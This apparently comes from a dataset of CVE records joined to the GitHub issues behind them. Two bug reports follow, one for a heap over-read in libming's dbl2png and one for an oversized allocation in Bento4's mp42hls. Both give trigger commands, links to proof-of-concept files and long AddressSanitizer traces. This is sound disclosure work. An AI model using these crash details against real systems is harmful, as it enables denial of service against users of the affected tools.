cve_id
stringlengths
13
16
cve_published
stringlengths
23
23
cve_descriptions
stringlengths
54
1.07k
cve_metrics
dict
cve_references
listlengths
1
34
cve_configurations
listlengths
1
5
url
stringlengths
39
77
cve_tags
sequencelengths
1
4
βŒ€
domain
stringclasses
1 value
issue_owner_repo
sequencelengths
2
2
issue_body
stringlengths
3
88.6k
βŒ€
issue_title
stringlengths
3
335
issue_comments_url
stringlengths
58
81
issue_comments_count
int64
0
146
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
39
62
issue_github_id
int64
128M
2.09B
issue_number
int64
1
122k
CVE-2019-3572
2019-01-02T15:29:00.330
An issue was discovered in libming 0.4.8. There is a heap-based buffer over-read in the function writePNG in the file util/dbl2png.c of the dbl2png command-line program. Because this is associated with an erroneous call to png_write_row in libpng, an out-of-bounds write might occur for some memory layouts.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/169" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/169
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
I found a a heap-buffer-overflow problem in function writePNG in file ./util/dbl2png.c:234. [poc.zip](https://github.com/libming/libming/files/2714649/poc.zip) ./debug/bin/dbl2png --verbose in2.dbl out.png image data RGB outsize=1605 size 65535 x 33023 unpacked data size t=1600 byte channel count=3 Segmentation fault (core dumped) ``` ==48243==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fdd403ff404 at pc 0x7fdd44327733 bp 0x7ffd2f1f8fa0 sp 0x7ffd2f1f8748 READ of size 262140 at 0x7fdd403ff404 thread T0 #0 0x7fdd44327732 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) #1 0x7fdd43e7fa17 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #2 0x7fdd43e7fa17 in png_write_row /home/fish/misc/libming/libpng-1.6.36/pngwrite.c:842 #3 0x557528274da6 in writePNG /home/fish/misc/libming/util/dbl2png.c:234 #4 0x5575282712d6 in main /home/fish/misc/libming/util/dbl2png.c:286 #5 0x7fdd43a8eb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #6 0x557528271859 in _start (/home/fish/misc/libming/afl/bin/dbl2png+0x2859) 0x7fdd403ff404 is located 0 bytes to the right of 66714628-byte region [0x7fdd3c45f800,0x7fdd403ff404) allocated by thread T0 here: #0 0x7fdd4438cb50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50) #1 0x55752827295b in readDBL /home/fish/misc/libming/util/dbl2png.c:133 #2 0x200000007 (<unknown module>) SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) Shadow bytes around the buggy address: 0x0ffc28077e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffc28077e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffc28077e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffc28077e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffc28077e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0ffc28077e80:[04]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffc28077e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffc28077ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffc28077eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffc28077ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffc28077ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==48243==ABORTING #0 __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:427 #1 0x00007ffff79a6a18 in memcpy (__len=<optimized out>, __src=<optimized out>, __dest=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #2 png_write_row (png_ptr=0x555555758490, row=<optimized out>) at pngwrite.c:842 #3 0x00005555555557e3 in writePNG (fp=0x555555758260, png=...) at dbl2png.c:234 #4 0x0000555555555a1a in main (argc=0x3, argv=0x7fffffffde68) at dbl2png.c:286 #5 0x00007ffff75b5b97 in __libc_start_main (main=0x5555555558a9 <main>, argc=0x3, argv=0x7fffffffde68, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffde58) at ../csu/libc-start.c:310 #6 0x0000555555554eca in _start () 229 if(png.color_type == PNG_COLOR_TYPE_RGB) 230 { 231 png_set_filler(png_ptr, 0, PNG_FILLER_BEFORE); 232 for (i=0;i<png.height-1;i++) 233 { // ptr=0x00007fffffffdce0 β†’ [...] β†’ 0x357a4fff2b6a42ff β†’ 234 png_write_row(png_ptr,ptr); 235 ptr+=png.width * 4; 236 } 237 } 238 if(png.color_type == PNG_COLOR_TYPE_PALETTE) 239 { gef➀ p ptr + png.width * 4 * 261 $3 = (byte *) 0x7ffff7395bfc "" gef➀ p ptr + png.width * 4 * 262 $4 = (byte *) 0x7ffff73d5bf8 <error: Cannot access memory at address 0x7ffff73d5bf8> ```
a heap-buffer-overflow problem in function writePNG in file ./util/dbl2png.c:234
https://api.github.com/repos/libming/libming/issues/169/comments
1
2018-12-28T10:35:44Z
2019-01-07T16:23:12Z
https://github.com/libming/libming/issues/169
394,605,758
169
CVE-2018-20659
2019-01-02T17:29:00.220
An issue was discovered in Bento4 1.5.1-627. The AP4_StcoAtom class in Core/Ap4StcoAtom.cpp has an attempted excessive memory allocation when called from AP4_AtomFactory::CreateAtomFromStream in Core/Ap4AtomFactory.cpp, as demonstrated by mp42hls.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/350" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*", "matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/350
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
A crafted input will lead to Memory allocation failed in Ap4StcoAtom.cpp at Bento4 1.5.1-627 Triggered by ./mp42hls crash7.mp4 Poc [crash7.mp4.zip](https://github.com/axiomatic-systems/Bento4/files/2718552/crash7.mp4.zip) Bento4 Version 1.5.1-627 The ASAN information is as follows: ``` ==10432==ERROR: AddressSanitizer failed to allocate 0x100002000 (4294975488) bytes of LargeMmapAllocator (error code: 12) ==10432==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x561a5fbfc000-0x561a602a2000 /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls 0x561a604a1000-0x561a604ab000 /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls 0x561a604ab000-0x561a6067f000 /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls 0x600000000000-0x602000000000 0x602000000000-0x602000010000 0x602000010000-0x602e00000000 0x602e00000000-0x602e00010000 0x602e00010000-0x603000000000 0x603000000000-0x603000010000 0x603000010000-0x603e00000000 0x603e00000000-0x603e00010000 0x603e00010000-0x604000000000 0x604000000000-0x604000010000 0x604000010000-0x604e00000000 0x604e00000000-0x604e00010000 0x604e00010000-0x606000000000 0x606000000000-0x606000010000 0x606000010000-0x606e00000000 0x606e00000000-0x606e00010000 0x606e00010000-0x607000000000 0x607000000000-0x607000010000 0x607000010000-0x607e00000000 0x607e00000000-0x607e00010000 0x607e00010000-0x608000000000 0x608000000000-0x608000010000 0x608000010000-0x608e00000000 0x608e00000000-0x608e00010000 0x608e00010000-0x60b000000000 0x60b000000000-0x60b000010000 0x60b000010000-0x60be00000000 0x60be00000000-0x60be00010000 0x60be00010000-0x60c000000000 0x60c000000000-0x60c000010000 0x60c000010000-0x60ce00000000 0x60ce00000000-0x60ce00010000 0x60ce00010000-0x60d000000000 0x60d000000000-0x60d000010000 0x60d000010000-0x60de00000000 0x60de00000000-0x60de00010000 0x60de00010000-0x60e000000000 0x60e000000000-0x60e000010000 0x60e000010000-0x60ee00000000 0x60ee00000000-0x60ee00010000 0x60ee00010000-0x611000000000 0x611000000000-0x611000010000 0x611000010000-0x611e00000000 0x611e00000000-0x611e00010000 0x611e00010000-0x615000000000 0x615000000000-0x615000010000 0x615000010000-0x615e00000000 0x615e00000000-0x615e00010000 0x615e00010000-0x616000000000 0x616000000000-0x616000010000 0x616000010000-0x616e00000000 0x616e00000000-0x616e00010000 0x616e00010000-0x619000000000 0x619000000000-0x619000010000 0x619000010000-0x619e00000000 0x619e00000000-0x619e00010000 0x619e00010000-0x621000000000 0x621000000000-0x621000010000 0x621000010000-0x621e00000000 0x621e00000000-0x621e00010000 0x621e00010000-0x624000000000 0x624000000000-0x624000010000 0x624000010000-0x624e00000000 0x624e00000000-0x624e00010000 0x624e00010000-0x631000000000 0x631000000000-0x631000020000 0x631000020000-0x631e00000000 0x631e00000000-0x631e00010000 0x631e00010000-0x640000000000 0x640000000000-0x640000003000 0x7f8b99e00000-0x7f8b99f00000 0x7f8b9a000000-0x7f8b9a100000 0x7f8b9a200000-0x7f8b9a300000 0x7f8b9a400000-0x7f8b9a500000 0x7f8b9a600000-0x7f8b9a700000 0x7f8b9a770000-0x7f8b9cac2000 0x7f8b9cac2000-0x7f8b9cc5f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7f8b9cc5f000-0x7f8b9ce5e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7f8b9ce5e000-0x7f8b9ce5f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7f8b9ce5f000-0x7f8b9ce60000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7f8b9ce60000-0x7f8b9ce7a000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7f8b9ce7a000-0x7f8b9d079000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7f8b9d079000-0x7f8b9d07a000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7f8b9d07a000-0x7f8b9d07b000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7f8b9d07b000-0x7f8b9d07f000 0x7f8b9d07f000-0x7f8b9d086000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7f8b9d086000-0x7f8b9d285000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7f8b9d285000-0x7f8b9d286000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7f8b9d286000-0x7f8b9d287000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7f8b9d287000-0x7f8b9d28a000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7f8b9d28a000-0x7f8b9d489000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7f8b9d489000-0x7f8b9d48a000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7f8b9d48a000-0x7f8b9d48b000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7f8b9d48b000-0x7f8b9d672000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7f8b9d672000-0x7f8b9d872000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7f8b9d872000-0x7f8b9d876000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7f8b9d876000-0x7f8b9d878000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7f8b9d878000-0x7f8b9d87c000 0x7f8b9d87c000-0x7f8b9d893000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7f8b9d893000-0x7f8b9da92000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7f8b9da92000-0x7f8b9da93000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7f8b9da93000-0x7f8b9da94000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7f8b9da94000-0x7f8b9dc0d000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25 0x7f8b9dc0d000-0x7f8b9de0d000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25 0x7f8b9de0d000-0x7f8b9de17000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25 0x7f8b9de17000-0x7f8b9de19000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25 0x7f8b9de19000-0x7f8b9de1d000 0x7f8b9de1d000-0x7f8b9df6d000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7f8b9df6d000-0x7f8b9e16d000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7f8b9e16d000-0x7f8b9e170000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7f8b9e170000-0x7f8b9e173000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7f8b9e173000-0x7f8b9edd8000 0x7f8b9edd8000-0x7f8b9edff000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7f8b9ee9f000-0x7f8b9efea000 0x7f8b9efea000-0x7f8b9efff000 0x7f8b9efff000-0x7f8b9f000000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7f8b9f000000-0x7f8b9f001000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7f8b9f001000-0x7f8b9f002000 0x7ffce3bd8000-0x7ffce3bf9000 [stack] 0x7ffce3bfb000-0x7ffce3bfe000 [vvar] 0x7ffce3bfe000-0x7ffce3c00000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==10432==End of process memory map. ==10432==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7f8b9df06c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7f8b9df25595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7f8b9df10492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7f8b9df1c8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7f8b9de46a51 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x29a51) #5 0x7f8b9defd5de in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe05de) #6 0x561a5ffcf4c4 in AP4_StcoAtom::AP4_StcoAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4StcoAtom.cpp:81 #7 0x561a5ffcf104 in AP4_StcoAtom::Create(unsigned int, AP4_ByteStream&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4StcoAtom.cpp:52 #8 0x561a5ff41d64 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:434 #9 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221 #10 0x561a5ff515bc in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:194 #11 0x561a5ffbe494 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4SampleEntry.cpp:115 #12 0x561a5ffc2710 in AP4_VisualSampleEntry::AP4_VisualSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4SampleEntry.cpp:742 #13 0x561a5ffc3f00 in AP4_AvcSampleEntry::AP4_AvcSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4SampleEntry.cpp:994 #14 0x561a5ff40e2d in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:306 #15 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221 #16 0x561a5ffd4ce5 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4StsdAtom.cpp:101 #17 0x561a5ffd4553 in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4StsdAtom.cpp:57 #18 0x561a5ff41ca4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:424 #19 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221 #20 0x561a5ff515bc in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:194 #21 0x561a5ff51030 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:139 #22 0x561a5ff50b8e in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:88 #23 0x561a5ff43519 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:764 #24 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221 #25 0x561a5ff515bc in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:194 #26 0x561a5ff51030 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:139 #27 0x561a5ff50b8e in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:88 #28 0x561a5ff43519 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:764 #29 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221 #30 0x561a5ff515bc in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:194 #31 0x561a5ff51030 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:139 #32 0x561a5ff50b8e in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:88 #33 0x561a5ff43519 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:764 #34 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221 #35 0x561a5ff515bc in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:194 #36 0x561a5ff51030 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:139 #37 0x561a5ffeb530 in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4TrakAtom.cpp:165 #38 0x561a5ff44589 in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls+0x348589) #39 0x561a5ff4193d in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:379 #40 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221 #41 0x561a5ff515bc in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:194 #42 0x561a5ff51030 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:139 #43 0x561a5ff83d52 in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4MoovAtom.cpp:80 #44 0x561a5ff44523 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls+0x348523) #45 0x561a5ff417b6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:359 #46 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221 #47 0x561a5ff3f8d3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:151 #48 0x561a5ff60849 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4File.cpp:104 #49 0x561a5ff604b8 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4File.cpp:78 #50 0x561a5ff2cec3 in main /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:1837 #51 0x7f8b9d4acb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #52 0x561a5ff20a89 in _start 